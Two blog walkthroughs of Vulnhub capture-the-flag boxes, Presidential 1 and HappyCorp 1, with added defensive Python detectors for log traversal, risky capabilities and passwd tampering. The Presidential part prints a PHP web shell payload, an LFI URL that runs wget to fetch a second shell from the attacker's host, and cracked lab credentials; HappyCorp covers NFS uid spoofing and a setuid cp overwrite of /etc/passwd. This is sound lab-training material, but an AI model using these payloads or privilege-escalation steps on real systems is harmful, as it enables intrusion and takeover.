Monday, July 20, 2020

Presidential: 1: Vulnhub CTF Walkthrough

Vulnhub: https://www.vulnhub.com/entry/presidential-1,500/ 
** Just a heads up, I was able to import into VMware Workstation without an issue. **
1. First, an nmap scan to find the CTF box’s IP address. Once discovered, a second nmap scan for the available service ports.

2. We have two open ports, 2082 and 80. Port 2082 was an SSH service and port 80 was an Apache web server.
3. We run a dirb scan against port 80 for directory enumeration.
4. We also need to observe and enumerate the web pages. I did this using Burp. Honestly, I did not find much for a while. I took note of the domain votenow.local and added it to my hosts file. However, I was presented with the same information.
5. This is where I asked the author of the CTF for a clue. He mentioned there may be a hidden sub-domain and a backup file that could help get me a foothold on the box. I never thought of virtual hosts for the box. I went straight to wfuzz:
wfuzz -c -w /opt/DirBuster/directory-list-2.3-small.txt --hl 282 --hc 400,403,404 -H "Host: FUZZ.votenow.local" -t 100 http://votenow.local
This is where I found datasafe as a possible subdomain. Time to add it to the hosts file.

6. This is where I scanned the hidden subdomain for all kinds of possible backup files.  Nothing. Well, interesting anyway. 
7.  What am I missing?  There must be a backup file somewhere.  I bet it is something simple too. Arrghhh.
8. Ok, clue number 2. The author suggested trying the main domain. Of course, I missed that, and it has CREDS!!
User: votebox
Password: casoj3FFASPsbyoRP
9. I was able to get in.  Then, I checked out the Metasploit module to see if it was exploitable: https://www.rapid7.com/db/modules/exploit/multi/http/phpmyadmin_lfi_rce
10. It did not work. Seems like it should have worked. Oh well, let’s check around.
11. So I see the users table.  I see there is a hash for the admin’s user account.  That is all I see but hopefully I can use it somehow. 
* Used the hash from the users table in the web app.  
* hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
12. So we have a username and password. I was not able to use them to log in or get different access to the phpMyAdmin app. Then I checked the phpMyAdmin version again and looked for vulns once more:
* https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/
* https://cupuzone.wordpress.com/2018/07/23/a-little-study-about-latest-phpmyadmin-4-8-0-4-8-1-lfi-vulnerability/
* https://www.exploit-db.com/exploits/44924
* https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e
* https://misduong.blogspot.com/2018/06/phpmyadmin-48x-lfi-to-rce-authorization.html
* https://cxsecurity.com/issue/WLB-2018070139
13.  I can exploit the LFI vuln using the database.  I was able to view the PHP config with phpinfo().  It took a minute to find the exact directory location for my session, but I eventually found it. 


14.  Now, let’s see if we can get a web shell in:   select "<?php passthru($_GET ['cmd']);exit;?>"
15.  http://datasafe.votenow.local/index.php?target=db_sql.php?/../../../../../../../../../../../../../../var/lib/php/session/sess_arnq9b3qlmeupe81tf632qj24qfeb39q&cmd=id
16. It worked.  We now know that the process is running as apache instead of root.  
17.  We should be able to get a better web shell in there.  We just need to host a page and get our small web shell to request the better one.


18.  With a wget, we were able to request it and rename it. We are able to go to the page and now we have our meterpreter web shell working:
http://datasafe.votenow.local/index.php?target=db_sql.php?/../../../../../../../../../../../../../../var/lib/php/session/sess_arnq9b3qlmeupe81tf632qj24qfeb39q&cmd=wget%20http://192.168.126.1/agoonie.php%20-O%20shell.php
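A detection-side complement to the session-file LFI chain in steps 13 to 18, added here as an example and not part of the original post: it scans Apache access log lines (constructed samples, with sess_EXAMPLE as a placeholder session id) for a traversing `target=` value, a reference to the PHP session directory, and the `cmd=` parameter the web shell uses.

```python
from __future__ import annotations
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample Apache access log lines (not from the original post): one
# normal phpMyAdmin request, one matching the session-file LFI + cmd= pattern,
# and one URL-encoded traversal attempt. sess_EXAMPLE is a placeholder id.
SAMPLE_LOG = """\
192.168.126.1 - - [20/Jul/2020:10:01:02 -0400] "GET /index.php?target=db_sql.php&db=votebox HTTP/1.1" 200 5120
192.168.126.1 - - [20/Jul/2020:10:02:15 -0400] "GET /index.php?target=db_sql.php?/../../../../var/lib/php/session/sess_EXAMPLE&cmd=id HTTP/1.1" 200 312
192.168.126.1 - - [20/Jul/2020:10:03:40 -0400] "GET /index.php?target=db_sql.php%3F%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1880
"""

# Pulls the client IP and request path out of a common/combined log format line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

def suspicious_reasons(request_path: str) -> list[str]:
    """Explain why a request path looks like the phpMyAdmin target= LFI chain."""
    decoded = unquote(unquote(request_path))  # tolerate single or double encoding
    query = parse_qs(urlparse(decoded).query, keep_blank_values=True)
    reasons = []
    for value in query.get("target", []):
        if "../" in value or "..\\" in value:
            reasons.append("traversal in target=")
        if "/var/lib/php/session/" in value or "sess_" in value:
            reasons.append("PHP session file referenced in target=")
    if "cmd" in query:
        reasons.append("cmd= parameter present (web shell style)")
    return reasons

def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client_ip, request_path, reasons) for every flagged log line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        reasons = suspicious_reasons(m["path"])
        if reasons:
            hits.append((m["ip"], m["path"], reasons))
    return hits

if __name__ == "__main__":
    for ip, path, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {path}\n    " + "; ".join(reasons))
```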
19. I looked around for processes running as root. Also, I looked for anything in the home directories. There was only the admin dir. It had two weird text files, user.txt and notes.txt. I also noted the version of the OS: Linux votenow.local 3.10.0-1127.13.1.el7.x86_64 #1 SMP.
[admin@votenow ~]$ cat notes.txt
cat notes.txt
Reminders:
1) Utilise new commands to backup and compress sensitive files
[admin@votenow ~]$ cat user.txt
cat user.txt
663ba6a402a57536772c6118e8181570
20.  I was stuck here.  Uploaded the LinEnum.sh file.  Looked for sticky bit files, more weird processes, etc.  Found nothing.  Clue number 3: Look up Linux ‘capabilities’ and you will find a file that will help. 
21. After reading about this, the clues from the text files in the admin folder finally made sense. Additional reading:
* https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/
* https://materials.rangeforce.com/tutorial/2020/02/19/Linux-PrivEsc-Capabilities/
* https://medium.com/@int0x33/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099
22. So I identified the tarS executable, which could copy the shadow file and allow us to read it. I tried to crack the hashes but no dice. I even thought I could possibly rewrite the file and add my own hash to it. Nope.
23. I remembered the --checkpoint exploit (wildcard injection). I had it in my notes from the OSCP or a previous CTF, but it was worth checking out. I tried writing a bash script that could possibly escalate me. Noooooope. Wait, it allowed me to read the shadow file. What about reading root’s ssh files??!!
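The audit a defender would run for the capability issue behind steps 20 to 23, added here as an example that is not from the original post: it parses `getcap -r /` output (a constructed sample covering both libcap output styles; the post does not say which capability tarS carried, so cap_dac_read_search, the one that permits reading the shadow file, is assumed) and reports binaries whose effective or permitted set grants file-system or uid 0 access.

```python
import re

# Capabilities that let a binary read or change arbitrary files, or reach
# uid 0, regardless of DAC permissions. Values explain the risk in a report.
HIGH_RISK = {
    "cap_dac_read_search": "read any file, e.g. /etc/shadow or root's .ssh keys",
    "cap_dac_override": "bypass read/write/execute permission checks",
    "cap_setuid": "change to uid 0",
    "cap_setgid": "change to gid 0",
    "cap_sys_admin": "broad admin operations (mounts, namespaces)",
    "cap_sys_ptrace": "attach to and control other processes",
}

# Matches both libcap output styles: "PATH = caps+flags" and "PATH caps=flags".
LINE_RE = re.compile(r"^(?P<path>\S+)(?: = | )(?P<caps>\S+)$")

def parse_getcap_line(line):
    """Return (path, set of capability names, flag string) or None if unparseable."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    parts = re.split(r"[+=]", m["caps"], maxsplit=1)
    if len(parts) != 2:
        return None
    return m["path"], set(parts[0].split(",")), parts[1]

def audit_getcap(output):
    """Return [(path, capability, risk)] for each high-risk effective/permitted cap."""
    findings = []
    for line in output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, names, flags = parsed
        if not ({"e", "p"} & set(flags)):
            continue  # inheritable-only sets grant nothing by themselves
        for cap in sorted(names & HIGH_RISK.keys()):
            findings.append((path, cap, HIGH_RISK[cap]))
    return findings

# Constructed sample of `getcap -r / 2>/dev/null` output (not captured from the
# box), mixing both formats. tarS carrying cap_dac_read_search is an assumption.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tarS = cap_dac_read_search+ep
/usr/sbin/arping cap_net_raw=ep
/usr/bin/python3 cap_setuid=i
"""
```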
24.  I see the ssh_id file and we have the ssh port.  Hopefully, it is not password protected.  We are in.  

25.  I had to thank the author for a great CTF. It was challenging and yet another reminder, keep reading and learning.  

Friday, June 7, 2019

HappyCorp 1: Vulnhub CTF Walkthrough

https://www.vulnhub.com/entry/happycorp-1,296/

1. nmap scan for the IP address. Once discovered, do a full scan for the available ports.

2. We have several ports open on the server. Looks like we have HTTP, SSH and NFS being presented. After checking the port services with amap, I decided to look at port 80 to see what kind of web app was presented.

3. Possible users for the web app. This could be useful if I have to brute-force for authentication.

4. Time for some directory enumeration.
5. Looks like there is an admin page and a /lib/ dir I should look at.

6. I captured the authentication POST request of the web app using Burp Suite so I could later use it for sqlmap (sqlmap -r "file"). However, it did not get me very far. Then, I used cewl to possibly build a dictionary file to brute-force the login page. Nope. Nothing. I used some info I got from the NFS share, but more on that later.

7. Now, let's look at what is available on the NFS share. It's worth checking for an available NFS share whenever you see ports 2049 and 111 open.

8. Ok. Now this was interesting. I connected to the share. I saw that it had a .ssh file. I was hoping to possibly get keys from it, but I did not have permission. I had to do some research: you can possibly trick the server by using version 3 of NFS, which has less security, by creating an identical user with the same ID. However, I already had that ID in use on my box. Well, that is what my Kali Linux VM is for. I just mounted it there and added the user/ID.

9. Now I am able to access the SSH keys. I copied them to both my main box and the Kali Linux VM.

10. I also decoded the flag on https://www.asciitohex.com/.

11. Ok. Now it is time to try to connect using the keys. Of course, the key is password protected. Well, we have a brute-forcer for that. I usually just use PD (phrasen|drescher).

12. Looks like the password is sheep.
13. Anyway, we are able to connect over SSH, but we are put into a restricted shell. Well, we already know we can try to get out of that.
https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells?slide=9
However, the usual bash --noprofile does not work. Luckily, using the /bin/sh option does work.

14. Looked around to see the usual stuff. The kernel was at a pretty good level. I went to check for sticky bits and saw /bin/cp.

15. This is when I switched direction and started to look at the web files. I found the hard-coded credentials from the source code of the main page.

16. It looks like I could use LFI to read files on the server from the browser if I were able to log in and browse to cms.php.

17. Ok. The credentials work for heather. I am able to login.

18. Ahh. I am able to read /etc/passwd by browsing to:

19.  However, I am already connected to the box and I am able to read files from it.  How would you be able to read the credentials from admin.php if you were not able to exploit NFS/SSH?? Well, still working on that.  I may have to ask the Vulnhub machine author.
20. As the Rock would say, FOCUS! I see the sticky bit on 'cp', so it can be executed as if the user were root. I looked up possible techniques on:
21. I just have to create a salted hash in a passwd file and copy it over the machine's /etc/passwd. I used the same Kali box for this trick.

22. The file is created. I just have to transfer it to the machine; I used wget to copy it over. Then I did a quick double check to make sure the changes were there.

23. Go time. Use the cp command and boom. I AM GROOT, ROOT!
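A defender-side check for the passwd overwrite in steps 20 to 23, added here as an example that is not part of the original post: it parses /etc/passwd contents (a constructed sample whose last entry mimics an appended uid 0 user with an inline placeholder hash) and reports extra uid 0 accounts, hashes stored in passwd instead of shadow, and empty password fields.

```python
import re

# One /etc/passwd entry: name:password:uid:gid:gecos:home:shell
PASSWD_RE = re.compile(
    r"^(?P<name>[^:]+):(?P<pw>[^:]*):(?P<uid>\d+):(?P<gid>\d+):[^:]*:(?P<home>[^:]*):(?P<shell>[^:]*)$"
)
# Password-field values that mean "look in /etc/shadow" or "locked"; anything
# else in that field is a real hash (or empty) and bypasses shadow entirely.
SHADOW_MARKERS = {"x", "*", "!", "!!"}

def audit_passwd(text):
    """Return (line_no, user, issue) for entries that suggest tampering with /etc/passwd."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        m = PASSWD_RE.match(raw)
        if not m:
            findings.append((n, raw, "malformed entry"))
            continue
        name, pw, uid = m["name"], m["pw"], int(m["uid"])
        if uid == 0 and name != "root":
            findings.append((n, name, "extra uid 0 account"))
        if pw == "":
            findings.append((n, name, "empty password field (passwordless login)"))
        elif pw not in SHADOW_MARKERS:
            findings.append((n, name, "password hash stored in /etc/passwd instead of /etc/shadow"))
    return findings

# Constructed sample (not the box's real file): the last entry mimics the
# walkthrough's trick of appending a uid 0 user with an inline crypt hash.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
heather:x:1000:1000:heather:/home/heather:/bin/bash
pwned:$6$constructedsalt$CONSTRUCTED.HASH.VALUE:0:0::/root:/bin/bash
"""

if __name__ == "__main__":
    for line_no, user, issue in audit_passwd(SAMPLE_PASSWD):
        print(f"line {line_no}: {user}: {issue}")
```

Pair this with file-integrity monitoring on /etc/passwd and a periodic setuid sweep (find / -perm -4000), since a setuid copy of cp is what made the overwrite possible.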

24. Got the flag and used the ascii site again to find out it was "hackergod".